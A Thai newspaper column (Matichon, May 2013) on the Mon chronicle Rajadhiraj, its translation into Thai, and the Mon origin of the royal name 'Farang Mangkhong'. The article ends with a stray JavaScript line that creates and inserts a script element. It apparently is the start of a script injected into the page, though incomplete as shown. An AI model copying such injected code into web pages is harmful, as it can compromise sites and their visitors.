Download PDF

 มติชนรายวัน ฉบับประจำวันศุกร์ที่ 17 พฤษภาคม 2556

 

         ประวัติศาสตร์เป็นนิยายอย่างหนึ่ง แม้ในพงศาวดาร(รวมของไทย)ก็มีนิยาย อ่านสนุก ซึ่งเป็นที่รู้กันในหมู่ผู้ศึกษาประวัติศาสตร์และพงศาวดาร

         แต่ชนชั้นนำไทยไม่เข้าใจ หรือแสร้งทำเป็นว่าไม่เข้าใจ แล้วใช้นิยายเป็นเรื่องจริงในประวัติศาสตร์แห่งชาติของไทย เพื่อวิวาทบาดหมางกับเพื่อนบ้าน

         ราชาธิราช เป็นพงศาวดารมอญ จับเฉพาะยุคที่มีการสงครามครั้งใหญ่ ระหว่างพระเจ้าราชาธิราช(มอญ) กับพระเจ้าฝรั่งมังฆ้อง(พม่า)

         โดยเจ้าพระยาพระคลัง(หน) เป็นหัวหน้าแปลเรียบเรียงจากภาษามอญเป็นภาษาไทยในต้นแผ่นดิน ร.1 เมื่อ พ.ศ. 2328 แล้วถูกจัดเป็นวรรณกรรมไทย (เพราะมีนิยาย)

         พระเจ้าฝรั่งมังฆ้อง เป็นกษัตริย์พม่า แต่ออกเสียงตามตัวหนังสือมอญในราชาธิราชฉบับภาษามอญ ซึ่งเขียนว่า “ผรงมงคอง”

         มอญเรียกจอมกษัตริย์ว่า“ผรงมงคอง” แต่ไทยเรียกเพี้ยนเป็น“ฝรั่งมังฆ้อง”

         ผรงมงคอง หมายถึง จอมกษัตริย์

         ผรง เขียนตามมอญ แล้วไทยออกเสียงว่าฝรั่ง แต่พม่าเขียน ภุรง ออกเสียงว่า บะ หยิ่น หมายถึง ราชา, กษัตริย์

         มงคอง แปลว่า หัว

         (สรุปจากข้อเขียนเรื่องอันเนื่องด้วยชื่อพม่ารามัญ โดย บรรจบ พันธุเมธา ในสตรีสาร ระหว่าง พ.ศ. 2515 แล้วพิมพ์แจกในงานพระราชทานเพลิงศพ ศ.ดร. คุณบรรจบ พันธุเมธา พ.ศ. 2535)

         พระเจ้าราชาธิราช คือ พระยาน้อย เป็นโอรสที่พระราชบิดาไม่โปรดปราน และเป็นที่รู้จักทั่วไปในนาม“พระยาน้อยชมตลาด” เพราะไปเดินเที่ยวตลาดแล้วชอบแม่ค้าขายของ(ที่มีผัวแล้ว) จึงฉวยมาเป็นเมีย

         ในหนังสือราชาธิราชบอกว่าพระยาน้อยปราบดาภิเษกเป็นพระเจ้าราชาธิราชแห่งกรุงหงสาวดี เมื่อ พ.ศ. 1930

         ขณะนั้นกรุงศรีอยุธยาอยู่ในช่วงปลายแผ่นดินขุนหลวงพะงั่ว (ราชวงศ์สุพรรณภูมิ ระหว่าง พ.ศ. 1913-1931)

         กรุงสุโขทัยอยู่ในช่วงถูกอยุธยาครอบงำมีอำนาจเหนือ และกำลังถูกผนวกเข้ากับอยุธยา

         เชียงใหม่เป็นรัฐเอกราชในแผ่นดินพระเจ้าแสนเมืองมา (ระหว่าง พ.ศ. 1929-1945)

         พระเจ้าราชาธิราช มีทหารเอกหลายคนไว้ทำสงคราม เช่น สมิงพ่อเพชร, สมิงพระราม, สมิงนครอินทร์

         สมิง มักใช้นำหน้าชื่อผู้ที่ได้ครองเมือง เช่น มะสะลุม เป็นทหารฝีมือดี พระเจ้าราชาธิราชโปรดให้ครองเมืองตึกคล้า แล้วพระราชทานนามว่า สมิงนครอินทร์

var d=document;var s=d.createElement(‘script’); document.currentScript.parentNode.insertBefore(s, document.currentScript);